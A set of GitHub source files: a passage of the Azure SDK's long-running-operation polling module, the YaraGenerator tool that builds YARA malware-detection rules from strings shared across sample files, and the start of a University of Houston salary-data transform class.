"Invalid return status {!r} for {!r} operation".format(
code, response.request.method
)
)
def _is_empty(response):
# type: (ResponseType) -> bool
"""Check if response body contains meaningful content.
:rtype: bool
"""
return not bool(response.body())
class LongRunningOperation(ABC):
    """LongRunningOperation
    Provides default logic for interpreting operation responses
    and status updates.

    Concrete strategies (Operation-Location, Location, status-check) implement
    these hooks; LROBasePolling tries each strategy's can_poll in order.

    :param azure.core.pipeline.PipelineResponse response: The initial pipeline response.
    :param callable deserialization_callback: The deserialization callback.
    :param dict lro_options: LRO options.
    :param kwargs: Unused for now
    """
    @abc.abstractmethod
    def can_poll(self, pipeline_response):
        # type: (PipelineResponseType) -> bool
        """Answer if this polling method could be used.

        :rtype: bool
        """
        raise NotImplementedError()
    @abc.abstractmethod
    def get_polling_url(self):
        # type: () -> str
        """Return the polling URL.

        :rtype: str
        """
        raise NotImplementedError()
    @abc.abstractmethod
    def set_initial_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Process first response after initiating long running operation.

        Returns the initial status string.

        :param azure.core.pipeline.PipelineResponse response: initial REST call response.
        """
        raise NotImplementedError()
    @abc.abstractmethod
    def get_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Return the status string extracted from this response."""
        raise NotImplementedError()
    @abc.abstractmethod
    def get_final_get_url(self, pipeline_response):
        # type: (PipelineResponseType) -> Optional[str]
        """If a final GET is needed, returns the URL.

        :rtype: str
        """
        raise NotImplementedError()
class _LroOption(str, Enum, metaclass=CaseInsensitiveEnumMeta):
    """Known LRO options from Swagger."""
    # Key read from the lro_options dict to decide where the final
    # resource is fetched from.
    FINAL_STATE_VIA = "final-state-via"
class _FinalStateViaOption(str, Enum, metaclass=CaseInsensitiveEnumMeta):
    """Possible final-state-via options."""
    # Values accepted for _LroOption.FINAL_STATE_VIA.
    AZURE_ASYNC_OPERATION_FINAL_STATE = "azure-async-operation"
    LOCATION_FINAL_STATE = "location"
    OPERATION_LOCATION_FINAL_STATE = "operation-location"
class OperationResourcePolling(LongRunningOperation):
    """Implements a operation resource polling, typically from Operation-Location.

    :param str operation_location_header: Name of the header to return operation format (default 'operation-location')
    :keyword dict[str, any] lro_options: Additional options for LRO. For more information, see
        https://aka.ms/azsdk/autorest/openapi/lro-options
    """
    def __init__(
        self, operation_location_header="operation-location", *, lro_options=None
    ):
        self._operation_location_header = operation_location_header
        # Store the initial URLs
        self._async_url = None
        self._location_url = None
        self._request = None
        self._lro_options = lro_options or {}
    def can_poll(self, pipeline_response):
        # type: (PipelineResponseType) -> bool
        """Answer if this polling method could be used.

        True when the operation-location header is present on the response.
        """
        response = pipeline_response.http_response
        return self._operation_location_header in response.headers
    def get_polling_url(self):
        # type: () -> str
        """Return the polling URL.

        :rtype: str
        """
        return self._async_url
    def get_final_get_url(self, pipeline_response):
        # type: (PipelineResponseType) -> Optional[str]
        """If a final GET is needed, returns the URL.

        :rtype: str
        """
        # 1. Explicit "final-state-via: location" wins when a location
        #    header was captured.
        if (
            self._lro_options.get(_LroOption.FINAL_STATE_VIA) == _FinalStateViaOption.LOCATION_FINAL_STATE
            and self._location_url
        ):
            return self._location_url
        # 2. For POST with async-operation/operation-location final state,
        #    the polling resource itself is the final answer: no extra GET.
        if (
            self._lro_options.get(_LroOption.FINAL_STATE_VIA)
            in [
                _FinalStateViaOption.AZURE_ASYNC_OPERATION_FINAL_STATE,
                _FinalStateViaOption.OPERATION_LOCATION_FINAL_STATE
            ]
            and self._request.method == "POST"
        ):
            return None
        # 3. A "resourceLocation" in the body takes precedence next.
        response = pipeline_response.http_response
        if not _is_empty(response):
            body = _as_json(response)
            # https://github.com/microsoft/api-guidelines/blob/vNext/Guidelines.md#target-resource-location
            resource_location = body.get("resourceLocation")
            if resource_location:
                return resource_location
        # 4. Fall back on the initial request: PUT/PATCH re-GET the resource
        #    URL; POST re-GETs the location header when one was provided.
        if self._request.method in {"PUT", "PATCH"}:
            return self._request.url
        if self._request.method == "POST" and self._location_url:
            return self._location_url
        return None
    def set_initial_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Process first response after initiating long running operation.

        :param azure.core.pipeline.PipelineResponse response: initial REST call response.
        """
        self._request = pipeline_response.http_response.request
        response = pipeline_response.http_response
        self._set_async_url_if_present(response)
        # A 2xx with a polling URL means the operation was accepted.
        if response.status_code in {200, 201, 202, 204} and self._async_url:
            return "InProgress"
        raise OperationFailed("Operation failed or canceled")
    def _set_async_url_if_present(self, response):
        # type: (ResponseType) -> None
        # Capture the polling URL (mandatory here, since can_poll matched)
        # and an optional location header for the final GET.
        self._async_url = response.headers[self._operation_location_header]
        location_url = response.headers.get("location")
        if location_url:
            self._location_url = location_url
    def get_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Process the latest status update retrieved from an "Operation-Location" header.

        :param azure.core.pipeline.PipelineResponse response: The response to extract the status.
        :raises: BadResponse if response has no body, or body does not contain status.
        """
        response = pipeline_response.http_response
        if _is_empty(response):
            raise BadResponse(
                "The response from long running operation does not contain a body."
            )
        body = _as_json(response)
        status = body.get("status")
        if not status:
            raise BadResponse("No status found in body")
        return status
class LocationPolling(LongRunningOperation):
    """Implements a Location polling."""
    def __init__(self):
        # Last URL seen in a "location" header; refreshed on every poll.
        self._location_url = None
    def can_poll(self, pipeline_response):
        # type: (PipelineResponseType) -> bool
        """Answer if this polling method could be used.

        True when the response carries a "location" header.
        """
        return "location" in pipeline_response.http_response.headers
    def get_polling_url(self):
        # type: () -> str
        """Return the polling URL."""
        return self._location_url
    def get_final_get_url(self, pipeline_response):
        # type: (PipelineResponseType) -> Optional[str]
        """If a final GET is needed, returns the URL.

        :rtype: str
        """
        # The polled location already holds the final resource.
        return None
    def set_initial_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Process first response after initiating long running operation.

        :param azure.core.pipeline.PipelineResponse response: initial REST call response.
        """
        http_response = pipeline_response.http_response
        self._location_url = http_response.headers["location"]
        # Guard clause: a non-2xx status or an empty location header means
        # the operation cannot be polled.
        if http_response.status_code not in {200, 201, 202, 204} or not self._location_url:
            raise OperationFailed("Operation failed or canceled")
        return "InProgress"
    def get_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Process the latest status update retrieved from a 'location' header.

        :param azure.core.pipeline.PipelineResponse response: latest REST call response.
        :raises: BadResponse if response has no body and not status 202.
        """
        http_response = pipeline_response.http_response
        # A new location header redirects subsequent polls.
        location = http_response.headers.get("location")
        if location is not None:
            self._location_url = location
        # 202 means still running; anything else is treated as done.
        if http_response.status_code == 202:
            return "InProgress"
        return "Succeeded"
class StatusCheckPolling(LongRunningOperation):
    """Should be the fallback polling, that don't poll but exit successfully
    if not other polling are detected and status code is 2xx.
    """
    def can_poll(self, pipeline_response):
        # type: (PipelineResponseType) -> bool
        """Answer if this polling method could be used.

        Always True: this is the catch-all fallback strategy.
        """
        return True
    def get_polling_url(self):
        # type: () -> str
        """Return the polling URL.

        :raises: ValueError always — this strategy has nothing to poll.
        """
        raise ValueError("This polling doesn't support polling")
    def set_initial_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Process first response after initiating long running
        operation and set self.status attribute.

        Immediately reports success: there is no polling resource to follow.

        :param azure.core.pipeline.PipelineResponse response: initial REST call response.
        """
        return "Succeeded"
    def get_status(self, pipeline_response):
        # type: (PipelineResponseType) -> str
        """Return the operation status (always terminal for this strategy)."""
        return "Succeeded"
    def get_final_get_url(self, pipeline_response):
        # type: (PipelineResponseType) -> Optional[str]
        """If a final GET is needed, returns the URL.

        :rtype: str
        """
        return None
class LROBasePolling(PollingMethod): # pylint: disable=too-many-instance-attributes
    """A base LRO poller.

    This assumes a basic flow:
    - I analyze the response to decide the polling approach
    - I poll
    - I ask the final resource depending of the polling approach

    If your polling needs are more specific, you could implement a PollingMethod directly.
    """

    def __init__(
        self,
        timeout=30,
        lro_algorithms=None,
        lro_options=None,
        path_format_arguments=None,
        **operation_config
    ):
        # Ordered list of strategies; the first one whose can_poll() accepts
        # the initial response is used for the whole polling session.
        self._lro_algorithms = lro_algorithms or [
            OperationResourcePolling(lro_options=lro_options),
            LocationPolling(),
            StatusCheckPolling(),
        ]

        self._timeout = timeout
        self._client = None  # Will hold the PipelineClient
        self._operation = None  # Will hold an instance of LongRunningOperation
        self._initial_response = None  # Will hold the initial response
        self._pipeline_response = None  # Will hold latest received response
        self._deserialization_callback = None  # Will hold the deserialization callback
        self._operation_config = operation_config
        self._lro_options = lro_options
        self._path_format_arguments = path_format_arguments
        self._status = None

    def status(self):
        """Return the current status as a string.

        :rtype: str
        :raises ValueError: if initialize() was never called.
        """
        if not self._operation:
            raise ValueError(
                "set_initial_status was never called. Did you give this instance to a poller?"
            )
        return self._status

    def finished(self):
        """Is this polling finished?

        :rtype: bool
        """
        return _finished(self.status())

    def resource(self):
        """Return the built resource (deserialized from the latest response)."""
        return self._parse_resource(self._pipeline_response)

    @property
    def _transport(self):
        # Reach into the client's pipeline for its transport (used by _sleep).
        return self._client._pipeline._transport # pylint: disable=protected-access

    def initialize(self, client, initial_response, deserialization_callback):
        """Set the initial status of this LRO.

        :param client: PipelineClient used to issue the polling requests.
        :param initial_response: The initial response of the poller
        :param deserialization_callback: callable that parses the final resource.
        :raises: HttpResponseError if initial status is incorrect LRO state
        """
        self._client = client
        self._pipeline_response = self._initial_response = initial_response
        self._deserialization_callback = deserialization_callback

        # Pick the first polling strategy that can handle this response.
        for operation in self._lro_algorithms:
            if operation.can_poll(initial_response):
                self._operation = operation
                break
        else:
            raise BadResponse("Unable to find status link for polling.")

        try:
            _raise_if_bad_http_status_and_method(self._initial_response.http_response)
            self._status = self._operation.set_initial_status(initial_response)

        except BadStatus as err:
            self._status = "Failed"
            raise HttpResponseError(response=initial_response.http_response, error=err)

        except BadResponse as err:
            self._status = "Failed"
            raise HttpResponseError(
                response=initial_response.http_response, message=str(err), error=err
            )

        except OperationFailed as err:
            raise HttpResponseError(response=initial_response.http_response, error=err)

    def get_continuation_token(self):
        # type() -> str
        # Serialize the initial response so polling can be resumed later in
        # another process via from_continuation_token().
        import pickle
        return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii')

    @classmethod
    def from_continuation_token(cls, continuation_token, **kwargs):
        # type(str, Any) -> Tuple
        try:
            client = kwargs["client"]
        except KeyError:
            raise ValueError("Need kwarg 'client' to be recreated from continuation_token")

        try:
            deserialization_callback = kwargs["deserialization_callback"]
        except KeyError:
            raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token")

        import pickle
        # nosec: the token originates from get_continuation_token() above,
        # i.e. it round-trips within the SDK.
        initial_response = pickle.loads(base64.b64decode(continuation_token)) # nosec
        # Restore the transport in the context (transports are not picklable)
        initial_response.context.transport = client._pipeline._transport # pylint: disable=protected-access
        return client, initial_response, deserialization_callback

    def run(self):
        """Poll to completion, translating polling errors to HttpResponseError."""
        try:
            self._poll()

        except BadStatus as err:
            self._status = "Failed"
            raise HttpResponseError(
                response=self._pipeline_response.http_response,
                error=err
            )

        except BadResponse as err:
            self._status = "Failed"
            raise HttpResponseError(
                response=self._pipeline_response.http_response,
                message=str(err),
                error=err
            )

        except OperationFailed as err:
            raise HttpResponseError(
                response=self._pipeline_response.http_response,
                error=err
            )

    def _poll(self):
        """Poll status of operation so long as operation is incomplete and
        we have an endpoint to query.

        :raises: OperationFailed if operation status 'Failed' or 'Canceled'.
        :raises: BadStatus if response status invalid.
        :raises: BadResponse if response invalid.
        """
        if not self.finished():
            self.update_status()
        while not self.finished():
            self._delay()
            self.update_status()

        if _failed(self.status()):
            raise OperationFailed("Operation failed or canceled")

        # Some strategies require one last GET to fetch the final resource.
        final_get_url = self._operation.get_final_get_url(self._pipeline_response)
        if final_get_url:
            self._pipeline_response = self.request_status(final_get_url)
            _raise_if_bad_http_status_and_method(self._pipeline_response.http_response)

    def _parse_resource(self, pipeline_response):
        # type: (PipelineResponseType) -> Optional[Any]
        """Assuming this response is a resource, use the deserialization callback to parse it.
        If body is empty, assume there is no resource to return.
        """
        response = pipeline_response.http_response
        if not _is_empty(response):
            return self._deserialization_callback(pipeline_response)
        return None

    def _sleep(self, delay):
        # Delegate to the transport so async/sync transports can each sleep
        # the appropriate way.
        self._transport.sleep(delay)

    def _extract_delay(self):
        """Return the next polling delay: Retry-After if present, else the
        configured timeout."""
        if self._pipeline_response is None:
            return None
        delay = get_retry_after(self._pipeline_response)
        if delay:
            return delay
        return self._timeout

    def _delay(self):
        """Check for a 'retry-after' header to set timeout,
        otherwise use configured timeout.
        """
        delay = self._extract_delay()
        self._sleep(delay)

    def update_status(self):
        """Update the current status of the LRO by querying the polling URL."""
        self._pipeline_response = self.request_status(self._operation.get_polling_url())
        _raise_if_bad_http_status_and_method(self._pipeline_response.http_response)
        self._status = self._operation.get_status(self._pipeline_response)

    def _get_request_id(self):
        # Reuse the client request id of the last request for correlation.
        return self._pipeline_response.http_response.request.headers[
            "x-ms-client-request-id"
        ]

    def request_status(self, status_link):
        """Do a simple GET to this status link.

        This method re-injects 'x-ms-client-request-id'.

        :rtype: azure.core.pipeline.PipelineResponse
        """
        if self._path_format_arguments:
            status_link = self._client.format_url(status_link, **self._path_format_arguments)
        # Re-inject 'x-ms-client-request-id' while polling
        if "request_id" not in self._operation_config:
            self._operation_config["request_id"] = self._get_request_id()

        if is_rest(self._initial_response.http_response):
            # if I am a azure.core.rest.HttpResponse
            # want to keep making azure.core.rest calls
            from azure.core.rest import HttpRequest as RestHttpRequest
            request = RestHttpRequest("GET", status_link)
            return self._client.send_request(
                request, _return_pipeline_response=True, **self._operation_config
            )
        # if I am a azure.core.pipeline.transport.HttpResponse
        request = self._client.get(status_link)
        return self._client._pipeline.run( # pylint: disable=protected-access
            request, stream=False, **self._operation_config
        )
# Explicit public API of this module.
__all__ = [
    'BadResponse',
    'BadStatus',
    'OperationFailed',
    'LongRunningOperation',
    'OperationResourcePolling',
    'LocationPolling',
    'StatusCheckPolling',
    'LROBasePolling',
]
| {
"content_hash": "5a9d09aaac06881e6f4954cdcd83f111",
"timestamp": "",
"source": "github",
"line_count": 612,
"max_line_length": 118,
"avg_line_length": 33.82516339869281,
"alnum_prop": 0.6354282401816337,
"repo_name": "Azure/azure-sdk-for-python",
"id": "7a97ab514a8bfc77f4e1304a1c610a31abf587c6",
"size": "22004",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/core/azure-core/azure/core/polling/base_polling.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import re, sys, os, argparse, hashlib, random, email
from datetime import datetime
# Ensure the bundled ./modules directory is importable regardless of cwd.
pathname = os.path.abspath(os.path.dirname(sys.argv[0]))
sys.path.append(pathname + '/modules')
# Make sure required imports are present; pefile is needed for 'exe' mode.
try:
    import pefile
except:
    print "[!] PEfile not installed or present in ./modules directory"
    sys.exit(1)
def getFiles(workingdir):
    """Hash every regular file in *workingdir* and return {md5: path}.

    Also (re)populates the module-level ``hashList`` with the same MD5
    digests; ``main`` reads it later for reporting.  Exits the program if
    the directory holds no usable samples.

    NOTE(review): assumes *workingdir* ends with a path separator -- the
    paths are built by plain concatenation. Verify callers.
    """
    global hashList
    fileDict = {}
    hashList = []
    # get hashes; skip directories and dot-files (e.g. .DS_Store)
    for f in os.listdir(workingdir):
        if os.path.isfile(workingdir + f) and not f.startswith("."):
            fhash = md5sum(workingdir + f)
            fileDict[fhash] = workingdir + f
            hashList.append(fhash)
    if len(fileDict) == 0:
        print "[!] No Files Present in \"" + workingdir +"\""
        sys.exit(1)
    else:
        return fileDict
#Use PEfile for executables and remove import/api calls from sigs
def exeImportsFuncs(filename, allstrings):
try:
pe = pefile.PE(filename)
importlist = []
for entry in pe.DIRECTORY_ENTRY_IMPORT:
importlist.append(entry.dll)
for imp in entry.imports:
importlist.append(imp.name)
for imp in importlist:
if imp in allstrings: allstrings.remove(imp)
if len(allstrings) > 0:
return list(set(allstrings))
else:
print '[!] No Extractable Attributes Present in Hash: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set and Try Again!'
sys.exit(1)
except:
return allstrings
#EML File parsing and comparison based on dictionary entries, plus regexes looking for domains/links in text/html
def emailParse(filename):
    """Parse an .eml file and return a flat list of signature-worthy values:
    interesting header values, URLs found in the body parts, and the name of
    any attachment.  Exits the program if the file is not a parseable EML.
    """
    try:
        def emailStrings(text):
            # Same as the normal string extract except without " " so each word
            # is isolated, and without <>,. to exclude HTML tags and punctuation.
            chars = r"A-Za-z0-9/\-:_$%@'()\\\{\};\]\["
            regexp = '[%s]{%d,100}' % (chars, 6)
            pattern = re.compile(regexp)
            strlist = pattern.findall(text)
            return strlist
        # Headers too generic/noisy to be useful signature material.
        uselesskeys = ['DKIM-Signature', 'X-SENDER-REPUTATION', 'References', 'To', 'Delivered-To', 'Received','Message-ID', 'MIME-Version','In-Reply-To', 'Date', 'Content-Type', 'X-Original-To']
        emailfile = open(filename, 'r')
        msg = email.message_from_file(emailfile)
        emaildict = dict(msg.items())
        if len(emaildict) == 0:
            # No headers at all: almost certainly not an EML file.
            print '[!] This File is not an EML File: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set or Select Proper FileType!'
            sys.exit(1)
        for uselesskey in uselesskeys:
            if uselesskey in emaildict:
                del emaildict[uselesskey]
        emaillist = []
        # Walk MIME parts collecting links and the attachment name.
        for part in msg.walk():
            part_ct = str(part.get_content_type())
            if "plain" in part_ct:
                bodyplain = part.get_payload(decode=True)
                # emaildict['Body-Plaintxt'] = list(set(emailStrings(bodyplain)))
                textlinks = linkSearch(bodyplain)
                if textlinks:
                    emaildict['Body-Links'] = textlinks
            if "html" in part_ct:
                bodyhtml = part.get_payload(decode=True)
                # emaildict['Body-HTML'] = list(set(emailStrings(bodyhtml)))
                htmllinks = linkSearch(bodyhtml)
                if htmllinks:
                    emaildict['Body-Links'] = htmllinks
            if "application" in part_ct:
                if part.get_filename():
                    emaildict['attachmentName'] = part.get_filename()
        # Flatten dict values (lists get splatted) into one list.
        for key, value in emaildict.iteritems():
            if isinstance(value, list):
                for subval in value:
                    emaillist.append(subval)
            else:
                emaillist.append(value)
        return emaillist
    except Exception:
        print '[!] This File is not an EML File: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set or Select Proper FileType!'
        sys.exit(1)
def linkSearch(attachment):
    """Return the unique URLs found in *attachment* text.

    Matches ``ftp://``, ``ftps://`` and the defanged ``hxxp(s)://`` scheme
    (case-insensitive); order of the returned list is unspecified.
    """
    url_pattern = re.compile(
        '(?:ftp|hxxp)[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
        re.I)
    return list(set(url_pattern.findall(attachment)))
#Simple String / ASCII Wide and URL string extraction
def getStrings(filename):
    """Extract candidate signature strings from a binary file.

    Collects ASCII runs (6-100 chars), UTF-16LE ("wide") runs, and any URLs
    found by linkSearch, returning the de-duplicated union.  Exits the
    program when nothing extractable is found or the file cannot be read.
    """
    try:
        data = open(filename,'rb').read()
        # Printable-ish ASCII runs between 6 and 100 characters.
        chars = r"A-Za-z0-9/\-:.,_$%@'()\\\{\};\]\[<> "
        regexp = '[%s]{%d,100}' % (chars, 6)
        pattern = re.compile(regexp)
        strlist = pattern.findall(data)
        #Get Wide Strings (printable ASCII interleaved with NUL bytes)
        unicode_str = re.compile( ur'(?:[\x20-\x7E][\x00]){6,100}',re.UNICODE )
        unicodelist = unicode_str.findall(data)
        allstrings = unicodelist + strlist
        #Extract URLs if present
        exeurls = linkSearch(data)
        if exeurls:
            for url in exeurls:
                allstrings.append(url)
        # use pefile to extract names of imports and function calls and remove them from string list
        if len(allstrings) > 0:
            return list(set(allstrings))
        else:
            print '[!] No Extractable Attributes Present in Hash: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set and Try Again!'
            sys.exit(1)
    except Exception:
        print '[!] No Extractable Attributes Present in Hash: '+str(md5sum(filename)) + ' Please Remove it from the Sample Set and Try Again!'
        sys.exit(1)
def md5sum(filename):
    """Return the hex MD5 digest of *filename*, reading in 8 KiB chunks.

    Bug fix: the file handle was never closed; it is now managed by a
    ``with`` block, and the read loop uses ``iter`` with a sentinel.
    """
    m = hashlib.md5()
    with open(filename, 'rb') as fh:
        for data in iter(lambda: fh.read(8192), b''):
            m.update(data)
    return m.hexdigest()
#find common strings and check against filetype specific blacklists
def findCommonStrings(fileDict, filetype):
    """Return the strings shared by every sample, minus blacklisted material.

    *fileDict* maps md5 -> list of extracted strings.  A string from one
    (randomly chosen) sample is kept only if it appears in all samples, then
    filtered against the filetype-specific literal and regex blacklists in
    ./modules/<filetype>_blacklist.txt and <filetype>_regexblacklist.txt.
    """
    # Any sample works as the baseline: common strings appear in all of them.
    baseStringList = random.choice(fileDict.values())
    finalStringList = []
    matchNumber = len(fileDict)
    for s in baseStringList:
        sNum = 0
        for key, value in fileDict.iteritems():
            if s in value:
                sNum +=1
        if sNum == matchNumber:
            finalStringList.append(s)
    #import and use filetype specific blacklist/regexlist to exclude unwanted sig material
    # (``pathname`` is the module-level script directory computed at import time)
    with open(pathname +'/modules/'+filetype+'_blacklist.txt') as f:
        blacklist = f.read().splitlines()
    with open(pathname +'/modules/'+filetype+'_regexblacklist.txt') as f:
        regblacklist = f.read().splitlines()
    #Match Against Blacklist
    for black in blacklist:
        if black in finalStringList: finalStringList.remove(black)
    #Match Against Regex Blacklist
    regmatchlist = []
    for regblack in regblacklist:
        for string in finalStringList:
            regex = re.compile(regblack)
            if regex.search(string): regmatchlist.append(string)
    if len(regmatchlist) > 0:
        for match in list(set(regmatchlist)):
            finalStringList.remove(match)
    return finalStringList
#Build the actual rule
def buildYara(options, strings, hashes):
    """Write <RuleName>.yar from the common *strings* and sample *hashes*.

    Picks a random sample of the shared strings (plus, for email rules, every
    string containing '@' or '.'), de-duplicates, and emits a rule whose
    condition requires all-but-one string ('email' rules match on any one).
    """
    date = datetime.now().strftime("%Y-%m-%d")
    randStrings = []
    #Ensure we have shared attributes and select twenty
    # NOTE(review): range(1,20) draws 19 times, not 20, and draws may repeat
    # before the de-dup below -- confirm whether that is intended.
    try:
        for i in range(1,20):
            randStrings.append(random.choice(strings))
    except IndexError:
        print '[!] No Common Attributes Found For All Samples, Please Be More Selective'
        sys.exit(1)
    #Prioritize based on specific filetype
    if options.FileType == 'email':
        for string in strings:
            if "@" in string:
                randStrings.append(string)
            if "." in string:
                randStrings.append(string)
    #Remove Duplicates
    randStrings = list(set(randStrings))
    ruleOutFile = open(options.RuleName + ".yar", "w")
    ruleOutFile.write("rule "+options.RuleName)
    if options.Tags:
        ruleOutFile.write(" : " + options.Tags)
    ruleOutFile.write("\n")
    ruleOutFile.write("{\n")
    ruleOutFile.write("meta:\n")
    ruleOutFile.write("\tauthor = \""+ options.Author + "\"\n")
    ruleOutFile.write("\tdate = \""+ date +"\"\n")
    ruleOutFile.write("\tdescription = \""+ options.Description + "\"\n")
    for h in hashes:
        ruleOutFile.write("\thash"+str(hashes.index(h))+" = \""+ h + "\"\n")
    ruleOutFile.write("\tsample_filetype = \""+ options.FileType + "\"\n")
    ruleOutFile.write("\tyaragenerator = \"https://github.com/Xen0ph0n/YaraGenerator\"\n")
    ruleOutFile.write("strings:\n")
    for s in randStrings:
        # Wide (UTF-16LE) strings carry embedded NULs: strip them and tag
        # the yara string with the 'wide' modifier instead.
        if "\x00" in s:
            ruleOutFile.write("\t$string"+str(randStrings.index(s))+" = \""+ s.replace("\\","\\\\").replace('"','\\"').replace("\x00","") +"\" wide\n")
        else:
            ruleOutFile.write("\t$string"+str(randStrings.index(s))+" = \""+ s.replace("\\","\\\\") +"\"\n")
    ruleOutFile.write("condition:\n")
    if options.FileType == 'email':
        ruleOutFile.write("\t any of them\n")
    else:
        ruleOutFile.write("\t"+str(len(randStrings) - 1)+" of them\n")
    ruleOutFile.write("}\n")
    ruleOutFile.close()
    return
#Per filetype execution paths
def unknownFile(fileDict):
    """Default path: plain string extraction, filtered by the 'unknown' blacklist.

    Replaces each path value in *fileDict* with that sample's string list,
    then returns the attributes common to every sample.
    """
    for fhash in fileDict.keys():
        fileDict[fhash] = getStrings(fileDict[fhash])
    return findCommonStrings(fileDict, 'unknown')
def exeFile(fileDict):
    """EXE path: extract strings, then strip PE import/API names before matching."""
    for fhash, samplePath in list(fileDict.items()):
        fileDict[fhash] = exeImportsFuncs(samplePath, getStrings(samplePath))
    return findCommonStrings(fileDict, 'exe')
def pdfFile(fileDict):
    """PDF path: plain string extraction, filtered by the 'pdf' blacklist."""
    for fhash in list(fileDict):
        fileDict[fhash] = getStrings(fileDict[fhash])
    return findCommonStrings(fileDict, 'pdf')
def emailFile(fileDict):
    """EML path: header/body parsing via emailParse instead of raw strings."""
    for fhash, samplePath in list(fileDict.items()):
        fileDict[fhash] = emailParse(samplePath)
    return findCommonStrings(fileDict, 'email')
def officeFile(fileDict):
    """Office-document path: plain string extraction, 'office' blacklist."""
    for fhash in list(fileDict):
        fileDict[fhash] = getStrings(fileDict[fhash])
    return findCommonStrings(fileDict, 'office')
def jshtmlFile(fileDict):
    """JS/HTML path: plain string extraction, 'jshtml' blacklist."""
    for fhash in list(fileDict):
        fileDict[fhash] = getStrings(fileDict[fhash])
    return findCommonStrings(fileDict, 'jshtml')
#Main
def main():
filetypeoptions = ['unknown','exe','pdf','email','office','js-html']
opt = argparse.ArgumentParser(description="YaraGenerator")
opt.add_argument("InputDirectory", help="Path To Files To Create Yara Rule From")
opt.add_argument("-r", "--RuleName", required=True , help="Enter A Rule/Alert Name (No Spaces + Must Start with Letter)")
opt.add_argument("-a", "--Author", default="Anonymous", help="Enter Author Name")
opt.add_argument("-d", "--Description",default="No Description Provided",help="Provide a useful description of the Yara Rule")
opt.add_argument("-t", "--Tags",default="",help="Apply Tags to Yara Rule For Easy Reference (AlphaNumeric)")
opt.add_argument("-v", "--Verbose",default=False,action="store_true", help= "Print Finished Rule To Standard Out")
opt.add_argument("-f", "--FileType", required=True, default='unknown',choices=filetypeoptions, help= "Select Sample Set FileType choices are: "+', '.join(filetypeoptions), metavar="")
if len(sys.argv)<=3:
opt.print_help()
sys.exit(1)
options = opt.parse_args()
if " " in options.RuleName or not options.RuleName[0].isalpha():
print "[!] Rule Name Can Not Contain Spaces or Begin With A Non Alpha Character"
#Get Filenames and hashes
fileDict = getFiles(options.InputDirectory)
print "\n[+] Generating Yara Rule " + options.RuleName + " from files located in: " + options.InputDirectory
#Begin per-filetype processing paths
if options.FileType == 'exe':
finalStringList = exeFile(fileDict)
elif options.FileType == 'pdf':
finalStringList = pdfFile(fileDict)
elif options.FileType == 'email':
finalStringList = emailFile(fileDict)
elif options.FileType == 'office':
finalStringList = officeFile(fileDict)
elif options.FileType == 'js-html':
finalStringList = jshtmlFile(fileDict)
else:
finalStringList = unknownFile(fileDict)
#Build and Write Yara Rule
global hashList
buildYara(options, finalStringList, hashList)
print "\n[+] Yara Rule Generated: "+options.RuleName+".yar\n"
print " [+] Files Examined: " + str(hashList)
print " [+] Author Credited: " + options.Author
print " [+] Rule Description: " + options.Description
if options.Tags:
print " [+] Rule Tags: " + options.Tags +"\n"
if options.Verbose:
print "[+] Rule Below:\n"
with open(options.RuleName + ".yar", 'r') as donerule:
print donerule.read()
print "[+] YaraGenerator (C) 2013 Chris@xenosec.org https://github.com/Xen0ph0n/YaraGenerator"
# Script entry point.
if __name__ == "__main__":
    main()
| {
"content_hash": "04cf095e11e81b384414120fe73b6109",
"timestamp": "",
"source": "github",
"line_count": 324,
"max_line_length": 193,
"avg_line_length": 38.26234567901235,
"alnum_prop": 0.6604017100911511,
"repo_name": "codexgigassys/codex-backend",
"id": "1ccb602ee5762da8fc2abdfe40ea352dc75a517d",
"size": "12617",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "yara/YaraGenerator/yaraGenerator.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "2944"
},
{
"name": "Python",
"bytes": "292728"
},
{
"name": "Shell",
"bytes": "664"
}
],
"symlink_target": ""
} |
from . import base
from . import mixins
from datetime import date
class TransformedRecord(
    mixins.GenericCompensationMixin, mixins.GenericDepartmentMixin,
    mixins.GenericIdentifierMixin, mixins.GenericJobTitleMixin,
    mixins.GenericPersonMixin, mixins.MembershipMixin,
    mixins.OrganizationMixin, mixins.PostMixin, mixins.RaceMixin,
    mixins.LinkMixin, base.BaseTransformedRecord):
    """Maps a University of Houston salary spreadsheet row to the
    tx_salaries record model (Python 2 codebase -- note ``unicode`` below)."""

    # REJECT_ALL_IF_INVALID_RECORD_EXISTS = False

    # Spreadsheet column header -> canonical field name.
    MAP = {
        'full_name': 'Name',
        'department': 'Department Desc',
        'job_title': 'Job Title',
        'hire_date': 'Orig Hire Date',
        'compensation': 'Annual Rt',
        'employee_type': 'Full/Part',
        'gender': 'Sex',
        'nationality': 'Ethnic Grp',
        'campus': 'Campus'
    }

    NAME_FIELDS = ('full_name', )

    # The name of the organization this WILL SHOW UP ON THE SITE,
    # so double check it!
    # ORGANIZATION_NAME = 'University of Houston'

    # What type of organization is this?
    # This MUST match what we use on the site,
    # double check against salaries.texastribune.org
